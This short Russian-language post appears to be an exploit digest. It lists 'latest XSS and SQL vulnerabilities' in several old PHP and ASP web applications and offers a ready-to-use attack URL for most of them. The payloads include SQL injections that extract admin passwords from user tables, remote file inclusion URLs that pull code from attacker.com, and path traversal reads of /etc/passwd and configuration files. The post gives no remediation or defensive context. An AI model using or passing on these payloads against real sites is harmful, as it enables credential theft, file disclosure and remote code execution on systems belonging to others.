Последние XSS и SQL-уязвимости

1. Hacks List phpBB Mod <= 1.21 Remote SQL Injection Vulnerability
http://[Target]/[Path]/admin/admin_hacks_list.php?mode=edit&hack_id=-99%20UNION%20SELECT%20
null,null,user_password,null,null,null,null,null,null,null,null,null%20
FROM%20phpbb_users%20Where%20user_id=2&sid=AdminHash

2. Sisfo Kampus <= 0.8 Remote File Inclusion / Download Vulnerabilities
http://www.victim.com/index.php?exec=http://attacker.com/evilcode.txt?
http://www.victim.com/print.php?print=http://attacker.com/evilcode.txt?
http://www.victim.com/index.php?exec=download&dir=/etc/passwd

3. SimpleBlog <= 2.3 (admin/edit.asp) Remote SQL Injection Vulnerability
http://[target]/[path]/admin/edit.asp?id=-1+union+select+0,uUSERNAME,uPASSWORD,0,0,0,0,0,0+from+t_users

4. com_flyspray Mambo Com. <= 1.0.1 Remote File Disclosure Vulnerability
http://[target]/[joomla_path]/components/com_flyspray/startdown.php?file=config.inc.php
http://[target]/[joomla_path]/components/com_flyspray/startdown.php?file=../../../../../etc/passwd%00

5. Cahier de texte V2.0 SQL Code Execution Exploit Bug
смотреть здесь